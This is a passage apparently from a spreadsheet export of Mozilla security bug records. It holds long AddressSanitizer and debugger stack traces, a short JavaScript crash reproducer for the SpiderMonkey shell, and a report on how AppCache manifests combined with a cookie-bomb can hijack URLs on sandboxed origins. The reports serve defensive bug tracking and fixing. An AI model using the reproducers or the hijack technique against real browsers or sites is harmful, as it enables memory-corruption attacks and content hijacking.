    #89 0x7f27906b31a8 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7465:7
    #90 0x7f27906ba2ff in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7362:13
    #91 0x7f278952e519 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1258:3
    #92 0x7f278952d4cc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:842:14
    #93 0x7f278952a368 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:732:9
    #94 0x7f278952c1e2 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
    #95 0x7f278952cf0c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
    #96 0x7f2787e3f9f2 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:635:28
    #97 0x7f278a53dc0b in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8879:18
    #98 0x7f278a53d7dc in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8805:9
    #99 0x7f278a51439d in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5279:3
    #100 0x7f278a5df1a2 in applyImpl&lt;nsDocument, void (nsDocument::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
    #101 0x7f278a5df1a2 in apply&lt;nsDocument, void (nsDocument::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
    #102 0x7f278a5df1a2 in mozilla::detail::RunnableMethodImpl&lt;nsDocument*, void (nsDocument::*)(), true, false&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
    #103 0x7f2787c5db31 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:259:32
    #104 0x7f2787c8fb30 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #105 0x7f2787c8c578 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #106 0x7f2788a2eed1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #107 0x7f2788990480 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #108 0x7f2788990480 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #109 0x7f2788990480 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #110 0x7f278db3530f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #111 0x7f2791177367 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:871:22
    #112 0x7f2788990480 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #113 0x7f2788990480 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #114 0x7f2788990480 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #115 0x7f2791176d7b in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:695:34
    #116 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #117 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #118 0x7f27a323082f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #119 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)
0x614000142c60 is located 32 bytes inside of 392-byte region [0x614000142c40,0x614000142dc8)
freed by thread T0 (Web Content) here:
    #0 0x4bb44b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f2787b3c357 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:25
    #2 0x7f2787b3bf57 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
    #3 0x7f2787b42f7d in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3839:3
    #4 0x7f2787b427a1 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3661:9
    #5 0x7f2787b45538 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4157:21
    #6 0x7f278a61bc18 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1452:3
    #7 0x7f278a193c5d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1339:3
    #8 0x7f2787caa1f1 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:115
    #9 0x7f278934f784 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2010:12
    #10 0x7f278934f784 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1329
    #11 0x7f278934f784 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
    #12 0x7f278935692c in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:983:12
    #13 0x7f27915c3e53 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #14 0x7f27915c3e53 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #15 0x7f27915ac698 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #16 0x7f27915ac698 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
    #17 0x7f27915925fe in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #18 0x7f27915c3fd8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #19 0x7f27915c4802 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #20 0x7f2791f3f723 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #21 0x7f278929946b in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #22 0x7f27915c3e53 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #23 0x7f27915c3e53 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #24 0x7f27915c4802 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #25 0x7f27921ce96e in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #26 0x7f2792185164 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #27 0x7f27921aee83 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #28 0x7f27921b17e7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #29 0x7f27915c41a3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #30 0x7f27915c41a3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #31 0x7f27915ac698 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #32 0x7f27915ac698 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
    #33 0x7f27915925fe in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #34 0x7f27915c3fd8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #35 0x7f27915c4802 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #36 0x7f2791f4142b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
previously allocated by thread T0 (Web Content) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ec75d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f278dc65a8b in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f278dc65a8b in mozilla::EditorBase::EnableUndo(bool) /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:759
    #4 0x7f278dddfac1 in EndEditorInit /home/worker/workspace/build/src/editor/libeditor/TextEditor.cpp:221:3
    #5 0x7f278dddfac1 in mozilla::AutoEditInitRulesTrigger::~AutoEditInitRulesTrigger() /home/worker/workspace/build/src/editor/libeditor/TextEditUtils.cpp:109
    #6 0x7f278dd3ce59 in mozilla::HTMLEditor::Init(nsIDOMDocument*, nsIContent*, nsISelectionController*, unsigned int, nsAString const&amp;) /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:316:3
    #7 0x7f278de39b24 in nsEditingSession::SetupEditorOnWindow(mozIDOMWindowProxy*) /home/worker/workspace/build/src/editor/composer/nsEditingSession.cpp:454:16
    #8 0x7f278de368c0 in nsEditingSession::MakeWindowEditable(mozIDOMWindowProxy*, char const*, bool, bool, bool) /home/worker/workspace/build/src/editor/composer/nsEditingSession.cpp:173:10
    #9 0x7f278c5e67d0 in nsHTMLDocument::EditingStateChanged() /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2843:25
    #10 0x7f278c5faded in SetDesignMode /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2956:10
    #11 0x7f278c5faded in nsHTMLDocument::SetDesignMode(nsAString const&amp;, nsIPrincipal&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2939
    #12 0x7f278bb573d7 in mozilla::dom::HTMLDocumentBinding::set_designMode(JSContext*, JS::Handle&lt;JSObject*&gt;, nsHTMLDocument*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:757:9
    #13 0x7f278bdf29dc in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2921:8
    #14 0x7f27915c3e53 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #15 0x7f27915c3e53 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #16 0x7f27915c5b69 in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #17 0x7f27915c5b69 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518
    #18 0x7f27915c5b69 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:647
    #19 0x7f2792458f1a in SetExistingProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2473:10
    #20 0x7f2792458f1a in js::NativeSetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::QualifiedBool, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2508
    #21 0x7f279217bbda in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1460:12
    #22 0x7f279217bbda in js::SetPropertyIgnoringNamedGetter(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::PropertyDescriptor&gt;, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/proxy/BaseProxyHandler.cpp:182
    #23 0x7f278bdfde54 in mozilla::dom::DOMProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /home/worker/workspace/build/src/dom/bindings/DOMJSProxyHandler.cpp:258:10
    #24 0x7f27921acef1 in js::Proxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:369:21
    #25 0x7f279209d19d in JSObject::nonNativeSetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/jsobj.cpp:1049:12
    #26 0x7f27915a599c in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1459:16
    #27 0x7f27915a599c in SetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:243
    #28 0x7f27915a599c in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2789
    #29 0x7f27915925fe in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #30 0x7f27915c3fd8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #31 0x7f27915c4802 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #32 0x7f27921ce96e in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #33 0x7f2792185164 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #34 0x7f27921aee83 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/P</t>
        </is>
      </c>
      <c r="X2223" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2224">
      <c r="A2224" t="n">
        <v>768313</v>
      </c>
      <c r="B2224" t="inlineStr">
        <is>
          <t>2012-06-25 20:19:16 -0700</t>
        </is>
      </c>
      <c r="C2224" t="inlineStr">
        <is>
          <t>Crash with newGlobal, newContext, --dump-bytecode</t>
        </is>
      </c>
      <c r="D2224" t="inlineStr">
        <is>
          <t>2013-11-07 11:30:03 -0800</t>
        </is>
      </c>
      <c r="E2224" t="n">
        <v>1</v>
      </c>
      <c r="F2224" t="n">
        <v>1</v>
      </c>
      <c r="G2224" t="n">
        <v>3</v>
      </c>
      <c r="H2224" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2224" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2224" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2224" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2224" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2224" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2224" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2224" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2224" t="inlineStr">
        <is>
          <t>js-triage-needed [advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q2224" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2224" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2224" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T2224" t="n">
        <v>1</v>
      </c>
      <c r="U2224" t="n">
        <v>0</v>
      </c>
      <c r="V2224" t="n">
        <v>16</v>
      </c>
      <c r="W2224" t="inlineStr">
        <is>
          <t>Created attachment 636581
stack trace
./js -m -n -a -D
var sandbox = newGlobal("same-compartment");
function inSandbox(code) { evalcx(code, sandbox); };
inSandbox("function six() { return 6; }");
inSandbox("evaluate('function qq() { return six(); }', {newContext: true});");
inSandbox("for (j = 0; j &lt;2 ; ++j) { qq(0); }")
-&gt; Crash in mjit code
The first "bad" revision is:
changeset:   648093316d93
user:        Jason Orendorff
date:        Thu May 17 18:54:30 2012 -0500
summary:     Bug 755808 - Add more options to JS shell evaluate() function. r=jimb.</t>
        </is>
      </c>
      <c r="X2224" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2225">
      <c r="A2225" t="n">
        <v>1005578</v>
      </c>
      <c r="B2225" t="inlineStr">
        <is>
          <t>2014-05-03 19:21:51 -0700</t>
        </is>
      </c>
      <c r="C2225" t="inlineStr">
        <is>
          <t>nsStandardURL::SetHost called net_ToLowerCase with a bogus pointer, #2</t>
        </is>
      </c>
      <c r="D2225" t="inlineStr">
        <is>
          <t>2015-08-30 12:11:58 -0700</t>
        </is>
      </c>
      <c r="E2225" t="n">
        <v>1</v>
      </c>
      <c r="F2225" t="n">
        <v>1</v>
      </c>
      <c r="G2225" t="n">
        <v>3</v>
      </c>
      <c r="H2225" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2225" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2225" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2225" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2225" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2225" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2225" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2225" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2225" t="inlineStr">
        <is>
          <t>[adv-main30+]</t>
        </is>
      </c>
      <c r="Q2225" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2225" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2225" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T2225" t="n">
        <v>1</v>
      </c>
      <c r="U2225" t="n">
        <v>0</v>
      </c>
      <c r="V2225" t="n">
        <v>18</v>
      </c>
      <c r="W2225" t="inlineStr">
        <is>
          <t>Created attachment 8416979
testcase (crashes Firefox when loaded)
Same symptoms as bug 991471, different testcase.</t>
        </is>
      </c>
      <c r="X2225" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2226">
      <c r="A2226" t="n">
        <v>1376459</v>
      </c>
      <c r="B2226" t="inlineStr">
        <is>
          <t>2017-06-27 09:12:17 -0700</t>
        </is>
      </c>
      <c r="C2226" t="inlineStr">
        <is>
          <t>AppCache issues (served on subpath allowed to set FALLBACK for whole origin, allowed to set on svg/xml)</t>
        </is>
      </c>
      <c r="D2226" t="inlineStr">
        <is>
          <t>2018-02-01 16:45:10 -0800</t>
        </is>
      </c>
      <c r="E2226" t="n">
        <v>1</v>
      </c>
      <c r="F2226" t="n">
        <v>1</v>
      </c>
      <c r="G2226" t="n">
        <v>3</v>
      </c>
      <c r="H2226" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2226" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2226" t="inlineStr">
        <is>
          <t>Networking: Cache</t>
        </is>
      </c>
      <c r="K2226" t="inlineStr">
        <is>
          <t>54 Branch</t>
        </is>
      </c>
      <c r="L2226" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2226" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2226" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2226" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2226" t="inlineStr">
        <is>
          <t>[necko-active][adv-main55+][adv-esr52.3+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2226" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2226" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2226" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T2226" t="n">
        <v>1</v>
      </c>
      <c r="U2226" t="n">
        <v>0</v>
      </c>
      <c r="V2226" t="n">
        <v>32</v>
      </c>
      <c r="W2226" t="inlineStr">
        <is>
          <t>Created attachment 8881398
source_and_results.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3142.0 Safari/537.36
Steps to reproduce:
It seems like the specification of how App Cache is working is a lot less restrictive compared to Service Workers. 
The following scenarios are possible using an App-Cache manifest in Firefox:
1. a file below a path (u/XYZ) can set FALLBACK for the complete origin
2. an SVG-file can set a manifest (even if mime is image/svg+xml)
3. an XML can set manifest (using xmlns=xhtml)
4. a manifest can be served on any content-type (spec says must be text/application-cache)
This currently affects a bunch of file serving services which uses sandboxed origins (exampleusercontent.com) but still serve inline content on the sandboxed domains. By triggering a cookie-bomb combined with a manifest, you're able to hijack any URL on the sandboxed domain using FALLBACK independently if the files are served from a sub-path on the domain. 
Manifest should (probably) not be possible to set from a subfolder onto the complete origin (this will probably break a bunch of apps tho)
Setting a manifest should probably be restricted to text/html only.
I've set up a test environment at http://avlidienbrunn.se/appcache/tests.html, see attached for full source code and results from other browsers.
FYI:
Chrome fixes:
1: Temporary fix by requiring Content-Type "text/application-cache" for setting FALLBACK outside of the current path, due to breaking existing apps. Currently tracked as 422987.
2: Chose not to fix
3: Chose not to fix
4: Chose not to fix (except in case #1)
Actual results:
1. Manifest was loaded
2. Manifest was loaded
3. Manifest was loaded
4. Manifest was loaded
Expected results:
1. Manifest was not loaded
2. Manifest was not loaded
3. Manifest was not loaded
4. Manifest was not loaded</t>
        </is>
      </c>
      <c r="X2226" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2227">
      <c r="A2227" t="n">
        <v>1206675</v>
      </c>
      <c r="B2227" t="inlineStr">
        <is>
          <t>2015-09-21 04:12:46 -0700</t>
        </is>
      </c>
      <c r="C2227" t="inlineStr">
        <is>
          <t>Assertion failure: isObject(), at ../../dist/include/js/Value.h:1237</t>
        </is>
      </c>
      <c r="D2227" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:03 -0700</t>
        </is>
      </c>
      <c r="E2227" t="n">
        <v>1</v>
      </c>
      <c r="F2227" t="n">
        <v>1</v>
      </c>
      <c r="G2227" t="n">
        <v>3</v>
      </c>
      <c r="H2227" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2227" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2227" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2227" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2227" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2227" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2227" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2227" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2227" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main44+] fixed by bug 1101561</t>
        </is>
      </c>
      <c r="Q2227" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2227" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2227" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2227" t="n">
        <v>1</v>
      </c>
      <c r="U2227" t="n">
        <v>0</v>
      </c>
      <c r="V2227" t="n">
        <v>12</v>
      </c>
      <c r="W2227" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision a6786bf8d71d (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2 --ion-extra-checks --ion-offthread-compile=off --baseline-eager main.js):
See attachment.
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x0000000000429010 in JS::Value::toObject (this=&lt;optimized out&gt;) at ../../dist/include/js/Value.h:1237
#0  0x0000000000429010 in JS::Value::toObject (this=&lt;optimized out&gt;) at ../../dist/include/js/Value.h:1237
#1  0x00000000004d591b in toObject (this=&lt;optimized out&gt;) at js/src/jsobj.h:547
#2  js::GlobalObject::getOrCreateStarGeneratorFunctionPrototype (cx=&lt;optimized out&gt;, global=...) at js/src/vm/GlobalObject.h:573
#3  0x00000000004f8740 in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::functionDef (this=this@entry=0x7fffffffb230, inHandling=inHandling@entry=js::frontend::InAllowed, yieldHandling=yieldHandling@entry=js::frontend::YieldIsName, funName=funName@entry=..., kind=kind@entry=js::frontend::Statement, generatorKind=generatorKind@entry=js::StarGenerator, invoked=invoked@entry=js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::PredictUninvoked) at js/src/frontend/Parser.cpp:2410
#4  0x00000000004f898d in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::functionStmt (this=this@entry=0x7fffffffb230, yieldHandling=yieldHandling@entry=js::frontend::YieldIsName, defaultHandling=defaultHandling@entry=js::frontend::NameRequired) at js/src/frontend/Parser.cpp:2877
